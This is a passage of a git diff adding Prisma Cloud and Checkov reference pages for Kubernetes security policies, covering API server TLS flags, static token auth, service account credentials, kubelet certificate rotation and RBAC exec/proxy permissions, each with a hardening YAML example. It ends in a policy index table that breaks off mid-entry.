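Because both arguments take a file path, a check of this kind needs the flag values, not just their presence. A small Python sketch (illustrative only, not Checkov's implementation; the helper names are hypothetical) that parses a container command into a flag-to-value map and validates both TLS arguments:

```python
# Illustrative helpers, not the actual Checkov implementation.

def command_flags(command):
    """Map each `--flag=value` argument to its value ("" when no value given)."""
    flags = {}
    for arg in command:
        if arg.startswith("--"):
            name, _, value = arg.partition("=")
            flags[name] = value
    return flags

def tls_configured(command):
    """True only if both TLS arguments are present with non-empty values."""
    flags = command_flags(command)
    return bool(flags.get("--tls-cert-file")) and bool(flags.get("--tls-private-key-file"))
```

For example, `tls_configured(["kube-apiserver"])` is False, while a command that supplies both flags with paths passes.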
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + " apiVersion: v1 + kind: Pod + metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system + spec: + containers: + - command: + - kube-apiserver ++ - --tls-cert-file=/path/to/cert ++ - --tls-private-key-file=/path/to/key + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-apiserver + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki ", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-token-auth-file-parameter-is-not-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-token-auth-file-parameter-is-not-set.adoc new file mode 100644 index 000000000..bdbd229ec --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-token-auth-file-parameter-is-not-set.adoc @@ -0,0 +1,96 @@ +== The --token-auth-file argument is Set +// 'The '--token-auth-file' argument is set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2972e238-4811-41dd-947c-2a52f1512e80 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py[CKV_K8S_70] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + 
+ +Do not use token-based authentication. +Token-based authentication uses static tokens to authenticate requests to the apiserver. +The tokens are stored in clear text in a file on the apiserver, and cannot be revoked or rotated without restarting the apiserver. +Hence, do not use static token-based authentication. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: + - kube-apiserver + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-apiserver + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-use-service-account-credentials-argument-is-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-use-service-account-credentials-argument-is-set-to-true.adoc new file mode 100644 index 000000000..1118a6d0b --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-use-service-account-credentials-argument-is-set-to-true.adoc @@ -0,0 +1,65 @@ +== The --use-service-account-credentials argument for controller managers is not set to True +// '--use-service-account-credentials' argument for controller managers not set
to True + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e74ba43b-4375-4df3-93c1-f9b5858d9b8d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py[CKV_K8S_108] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Use individual service account credentials for each controller. +The controller manager creates a service account per controller in the kube-system namespace, generates a credential for it, and builds a dedicated API client with that service account credential for each controller loop to use. +Setting --use-service-account-credentials to true runs each control loop within the controller manager using a separate service account credential. +When used in combination with RBAC, this ensures that the control loops run with the minimum permissions required to perform their intended tasks.
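Checking this flag means scanning the controller manager's command line for `--use-service-account-credentials` and evaluating its value. A minimal Python sketch (illustrative, not Checkov's implementation; the function name is hypothetical, and the assumption that a bare boolean flag counts as true follows the usual Go flag convention):

```python
# Illustrative sketch, not the actual Checkov implementation.

def uses_service_account_credentials(command):
    """True if the controller manager command enables per-controller
    service account credentials. The flag defaults to false; a bare
    `--use-service-account-credentials` is treated as true (Go flag style)."""
    for arg in command:
        if arg == "--use-service-account-credentials":
            return True
        if arg.startswith("--use-service-account-credentials="):
            return arg.split("=", 1)[1].lower() == "true"
    return False
```

A command that omits the flag, or sets it to false, would be flagged by this policy.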
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + " apiVersion: v1 + kind: Pod + metadata: + creationTimestamp: null + labels: + component: kube-controller-manager + tier: control-plane + name: kube-controller-manager + namespace: kube-system + spec: + containers: + - command: + - kube-controller-manager ++ - --use-service-account-credentials=true + image: gcr.io/google_containers/kube-controller-manager-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-the-rotatekubeletservercertificate-argument-for-kubelets-is-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-the-rotatekubeletservercertificate-argument-for-kubelets-is-set-to-true.adoc new file mode 100644 index 000000000..3d58f43e3 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-the-rotatekubeletservercertificate-argument-for-kubelets-is-set-to-true.adoc @@ -0,0 +1,43 @@ +== Ensure the RotateKubeletServerCertificate argument for kubelets is set to True +// Ensure the 'RotateKubeletServerCertificate' argument for kubelets is set to True + +=== Description + + +Enable kubelet server certificate rotation. +RotateKubeletServerCertificate causes the kubelet to both request a serving certificate after bootstrapping its client credentials and rotate the certificate as its existing credentials expire. +This automated periodic rotation ensures that there are no downtimes due to expired certificates, thus addressing availability in the CIA security triad. + +NOTE: This recommendation only applies if you let kubelets get their certificates from the API server. If your kubelet certificates come from an outside authority or tool (e.g., Vault), you need to take care of rotation yourself.
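Because feature gates are packed into a single comma-separated `--feature-gates` argument, a check for this setting has to parse that list rather than match the whole flag. A Python sketch of that parsing (illustrative only, not the actual Checkov implementation; the function name is hypothetical):

```python
# Illustrative sketch, not the actual Checkov implementation.

def rotate_server_cert_enabled(command):
    """True if --feature-gates enables RotateKubeletServerCertificate."""
    for arg in command:
        if arg.startswith("--feature-gates="):
            gates = arg.split("=", 1)[1]
            # Feature gates are a comma-separated list of Name=bool pairs.
            for gate in gates.split(","):
                name, _, value = gate.partition("=")
                if name.strip() == "RotateKubeletServerCertificate":
                    return value.strip().lower() == "true"
    return False
```

Note that the gate must be found and explicitly true; a kubelet command with no `--feature-gates`, or one that lists the gate as false among other gates, fails the check.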
+ + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --feature-gates=RotateKubeletServerCertificate=true + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/granting-create-permissions-to-nodesproxy-or-podsexec-sub-resources-allows-potential-privilege-escalation.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/granting-create-permissions-to-nodesproxy-or-podsexec-sub-resources-allows-potential-privilege-escalation.adoc new file mode 100644 index 000000000..4c5613a4b --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/granting-create-permissions-to-nodesproxy-or-podsexec-sub-resources-allows-potential-privilege-escalation.adoc @@ -0,0 +1,56 @@ +== Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1adf8c5c-67c2-498b-9022-fba893151928 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml[CKV2_K8S_2] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +In Kubernetes, granting the create permission to the nodes/proxy or pods/exec sub resources can potentially allow privilege escalation. +This is because these sub resources enable users to access and control the Kubernetes nodes and pods in the cluster. +If a user has the create permission for the nodes/proxy sub resource, they would be able to create a proxy to any node in the cluster.
+This would allow them to access the node as if they were directly logged in to it, potentially giving them access to sensitive information or allowing them to perform actions that they are not supposed to be able to perform. +Similarly, if a user has the create permission for the pods/exec sub resource, they would be able to execute commands on any pod in the cluster. +This could allow them to gain access to the containers running on the pod, potentially giving them access to sensitive information or allowing them to perform unauthorized actions. +Therefore, it is important to carefully consider whether to grant the create permission for the nodes/proxy and pods/exec sub resources, as doing so could potentially allow privilege escalation. +It may be safer to only grant these permissions to trusted users who have a legitimate need for them, and to monitor their usage to ensure that they are not being used for unauthorized purposes. + +=== Fix - Buildtime + + +[source,yaml] +---- +{ + "apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: restricted-access +rules: +- apiGroups: [""] + resources: ["nodes/proxy", "pods/exec"] + verbs: ["get", "list"]", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/kubernetes-policy-index.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/kubernetes-policy-index.adoc new file mode 100644 index 000000000..d6fd0d470 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/kubernetes-policy-index.adoc @@ -0,0 +1,593 @@ +== Kubernetes Policy Index + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-k8s-1.adoc[Containers wishing to share host process ID namespace admitted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ShareHostPIDPSP.py[CKV_K8S_1] +|MEDIUM + + +|xref:bc-k8s-10.adoc[CPU limits are not set] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/CPULimits.py[CKV_K8S_11] +|LOW + + +|xref:bc-k8s-11.adoc[Memory requests are not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py[CKV_K8S_12] +|LOW + + +|xref:bc-k8s-12.adoc[Memory limits are not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py[CKV_K8S_13] +|LOW + + +|xref:bc-k8s-13.adoc[Image tag is not set to Fixed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py[CKV_K8S_14] +|LOW + + +|xref:bc-k8s-14.adoc[Image pull policy is not set to Always] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py[CKV_K8S_15] +|LOW + + +|xref:bc-k8s-15.adoc[Container is privileged] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py[CKV_K8S_16] +|HIGH + + +|xref:bc-k8s-16.adoc[Containers share host process ID namespace] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py[CKV_K8S_17] +|MEDIUM + + +|xref:bc-k8s-17.adoc[Containers share host IPC namespace] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py[CKV_K8S_18] +|MEDIUM + + +|xref:bc-k8s-18.adoc[Containers share the host network namespace] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py[CKV_K8S_19] +|MEDIUM + + +|xref:bc-k8s-19.adoc[Containers run with AllowPrivilegeEscalation] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py[CKV_K8S_20] +|MEDIUM + + +|xref:bc-k8s-2.adoc[Privileged containers are admitted] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/PrivilegedContainersPSP.py[CKV_K8S_2] +|HIGH + + +|xref:bc-k8s-20.adoc[Default namespace is used] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py[CKV_K8S_21] +|LOW + + +|xref:bc-k8s-21.adoc[Read-Only filesystem for containers is not used] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py[CKV_K8S_22] +|LOW + + +|xref:bc-k8s-22.adoc[Admission of root containers not minimized] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RootContainers.py[CKV_K8S_23] +|MEDIUM + + +|xref:bc-k8s-23.adoc[Containers with added capability are allowed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py[CKV_K8S_24] +|LOW + + +|xref:bc-k8s-24.adoc[Admission of containers with added capability is not minimized] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py[CKV_K8S_25] +|LOW + + +|xref:bc-k8s-25.adoc[hostPort is specified] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/HostPort.py[CKV_K8S_26] +|LOW + + +|xref:bc-k8s-26.adoc[Mounting Docker socket daemon in a container is not limited] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py[CKV_K8S_27] +|MEDIUM + + +|xref:bc-k8s-27.adoc[Admission of containers with NET_RAW capability is not minimized] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py[CKV_K8S_28] +|LOW + + +|xref:bc-k8s-28.adoc[securityContext is not applied to pods and containers in container context] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py[CKV_K8S_30] +|LOW + + +|xref:bc-k8s-29.adoc[seccomp is not set to Docker/Default or Runtime/Default] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/Seccomp.py[CKV_K8S_31] +|LOW + + +|xref:bc-k8s-3.adoc[Containers wishing to share host IPC namespace admitted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py[CKV_K8S_3] +|MEDIUM + + +|xref:bc-k8s-30.adoc[seccomp profile is not set to Docker/Default or Runtime/Default] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/SeccompPSP.py[CKV_K8S_32] +|LOW + + +|xref:bc-k8s-31.adoc[Kubernetes dashboard is deployed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py[CKV_K8S_33] +|LOW + + +|xref:bc-k8s-32.adoc[Tiller (Helm V2) is deployed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/Tiller.py[CKV_K8S_34] +|LOW + + +|xref:bc-k8s-33.adoc[Secrets used as environment variables] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/Secrets.py[CKV_K8S_35] +|LOW + + +|xref:bc-k8s-34.adoc[Admission of containers with capabilities assigned is not limited] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py[CKV_K8S_37] +|LOW + + +|xref:bc-k8s-35.adoc[Service account tokens are not mounted where necessary] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py[CKV_K8S_38] +|LOW + + +|xref:bc-k8s-36.adoc[CAP_SYS_ADMIN Linux capability is used] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py[CKV_K8S_39] +|HIGH + + +|xref:bc-k8s-37.adoc[Containers do not run with a high UID] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py[CKV_K8S_40] +|LOW + + +|xref:bc-k8s-38.adoc[Default service accounts are actively used] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py[CKV_K8S_41] +|LOW + + +|xref:bc-k8s-39.adoc[Images are not selected using a digest] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ImageDigest.py[CKV_K8S_43] +|LOW + + +|xref:bc-k8s-4.adoc[Containers wishing to share host network namespace admitted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespacePSP.py[CKV_K8S_4] +|MEDIUM + + +|xref:bc-k8s-40.adoc[Tiller (Helm V2) deployment is accessible from within the cluster] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py[CKV_K8S_45] +|LOW + + +|xref:bc-k8s-41.adoc[Tiller (Helm v2) service is not deleted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/TillerService.py[CKV_K8S_44] +|LOW + + +|xref:bc-k8s-5.adoc[Root containers admitted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py[CKV_K8S_6] +|MEDIUM + + +|xref:bc-k8s-6.adoc[Containers with NET_RAW capability admitted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py[CKV_K8S_7] +|LOW + + +|xref:bc-k8s-7.adoc[Liveness probe is not configured] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py[CKV_K8S_8] +|LOW + + +|xref:bc-k8s-8.adoc[Readiness probe is not configured] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py[CKV_K8S_9] +|LOW + + +|xref:bc-k8s-9.adoc[CPU request is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/CPURequests.py[CKV_K8S_10] +|LOW + + +|xref:ensure-clusterroles-that-grant-control-over-validating-or-mutating-admission-webhook-configurations-are-minimized.adoc[Kubernetes ClusterRoles that grant control over validating or mutating admission webhook configurations are not minimized] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RbacControlWebhooks.py[CKV_K8S_155] +|HIGH + + +|xref:ensure-clusterroles-that-grant-permissions-to-approve-certificatesigningrequests-are-minimized.adoc[Kubernetes ClusterRoles that grant permissions to approve CertificateSigningRequests are not minimized] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RbacApproveCertificateSigningRequests.py[CKV_K8S_156] +|HIGH + + +|xref:ensure-containers-do-not-run-with-allowprivilegeescalation.adoc[Containers run with AllowPrivilegeEscalation based on Pod Security Policy setting] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalationPSP.py[CKV_K8S_5] +|MEDIUM + + +|xref:ensure-default-service-accounts-are-not-actively-used.adoc[Default Kubernetes service accounts are actively used by bounding to a role or cluster role] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py[CKV_K8S_42] +|LOW + + +|xref:ensure-minimized-wildcard-use-in-roles-and-clusterroles.adoc[Wildcard use is not minimized in Roles and ClusterRoles] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py[CKV_K8S_49] +|MEDIUM + + +|xref:ensure-roles-and-clusterroles-that-grant-permissions-to-bind-rolebindings-or-clusterrolebindings-are-minimized.adoc[Kubernetes Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings are not minimized] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py[CKV_K8S_157] +|MEDIUM + + +|xref:ensure-roles-and-clusterroles-that-grant-permissions-to-escalate-roles-or-clusterrole-are-minimized.adoc[Kubernetes Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRole are not minimized] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py[CKV_K8S_158] +|MEDIUM + + +|xref:ensure-securitycontext-is-applied-to-pods-and-containers.adoc[securityContext is not applied to pods and containers] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py[CKV_K8S_29] +|LOW + + +|xref:ensure-that-the-admission-control-plugin-alwaysadmit-is-not-set.adoc[The admission control plugin AlwaysAdmit is set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py[CKV_K8S_79] +|MEDIUM + + +|xref:ensure-that-the-admission-control-plugin-alwayspullimages-is-set.adoc[The admission control plugin AlwaysPullImages is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py[CKV_K8S_80] +|MEDIUM + + +|xref:ensure-that-the-admission-control-plugin-eventratelimit-is-set.adoc[The admission control plugin EventRateLimit is not set] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlEventRateLimit.py[CKV_K8S_78] +|MEDIUM + + +|xref:ensure-that-the-admission-control-plugin-namespacelifecycle-is-set.adoc[The admission control plugin NamespaceLifecycle is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py[CKV_K8S_83] +|LOW + + +|xref:ensure-that-the-admission-control-plugin-noderestriction-is-set.adoc[The admission control plugin NodeRestriction is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py[CKV_K8S_85] +|MEDIUM + + +|xref:ensure-that-the-admission-control-plugin-podsecuritypolicy-is-set.adoc[The admission control plugin PodSecurityPolicy is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py[CKV_K8S_84] +|LOW + + +|xref:ensure-that-the-admission-control-plugin-securitycontextdeny-is-set-if-podsecuritypolicy-is-not-used.adoc[The admission control plugin SecurityContextDeny is set if PodSecurityPolicy is used] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py[CKV_K8S_81] +|LOW + + +|xref:ensure-that-the-admission-control-plugin-serviceaccount-is-set.adoc[The admission control plugin ServiceAccount is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py[CKV_K8S_82] +|LOW + + +|xref:ensure-that-the-anonymous-auth-argument-is-set-to-false-1.adoc[The --anonymous-auth argument is not set to False for API server] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py[CKV_K8S_68] +|LOW + + 
+|xref:ensure-that-the-anonymous-auth-argument-is-set-to-false.adoc[The --anonymous-auth argument is not set to False for Kubelet] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py[CKV_K8S_138] +|MEDIUM + + +|xref:ensure-that-the-api-server-only-makes-use-of-strong-cryptographic-ciphers.adoc[The API server does not make use of strong cryptographic ciphers] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py[CKV_K8S_105] +|HIGH + + +|xref:ensure-that-the-audit-log-maxage-argument-is-set-to-30-or-as-appropriate.adoc[The --audit-log-maxage argument is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py[CKV_K8S_92] +|LOW + + +|xref:ensure-that-the-audit-log-maxbackup-argument-is-set-to-10-or-as-appropriate.adoc[The --audit-log-maxbackup argument is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py[CKV_K8S_93] +|LOW + + +|xref:ensure-that-the-audit-log-maxsize-argument-is-set-to-100-or-as-appropriate.adoc[The --audit-log-maxsize argument is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py[CKV_K8S_94] +|LOW + + +|xref:ensure-that-the-audit-log-path-argument-is-set.adoc[The --audit-log-path argument is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py[CKV_K8S_91] +|MEDIUM + + +|xref:ensure-that-the-authorization-mode-argument-includes-node.adoc[The --authorization-mode argument does not include Node] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py[CKV_K8S_75] +|MEDIUM + + 
+|xref:ensure-that-the-authorization-mode-argument-includes-rbac.adoc[The --authorization-mode argument does not include RBAC] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py[CKV_K8S_77] +|LOW + + +|xref:ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow-1.adoc[The --authorization-mode argument is set to AlwaysAllow for API server] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py[CKV_K8S_74] +|MEDIUM + + +|xref:ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow.adoc[The --authorization-mode argument is set to AlwaysAllow for Kubelet] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py[CKV_K8S_139] +|LOW + + +|xref:ensure-that-the-auto-tls-argument-is-not-set-to-true.adoc[The --auto-tls argument is set to True] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py[CKV_K8S_118] +|HIGH + + +|xref:ensure-that-the-basic-auth-file-argument-is-not-set.adoc[The --basic-auth-file argument is set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py[CKV_K8S_69] +|LOW + + +|xref:ensure-that-the-bind-address-argument-is-set-to-127001-1.adoc[The --bind-address argument is not set to 127.0.0.1] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py[CKV_K8S_115] +|HIGH + + +|xref:ensure-that-the-bind-address-argument-is-set-to-127001.adoc[The --bind-address argument for controller managers is not set to 127.0.0.1] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py[CKV_K8S_113] +|HIGH + + 
+|xref:ensure-that-the-cert-file-and-key-file-arguments-are-set-as-appropriate.adoc[The --cert-file and --key-file arguments are not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py[CKV_K8S_116] +|HIGH + + +|xref:ensure-that-the-client-ca-file-argument-is-set-as-appropriate-scored.adoc[The --client-ca-file argument for API Servers is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py[CKV_K8S_140] +|LOW + + +|xref:ensure-that-the-client-cert-auth-argument-is-set-to-true.adoc[The --client-cert-auth argument is not set to True] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py[CKV_K8S_117] +|MEDIUM + + +|xref:ensure-that-the-etcd-cafile-argument-is-set-as-appropriate-1.adoc[The --etcd-cafile argument is not set appropriately] +| 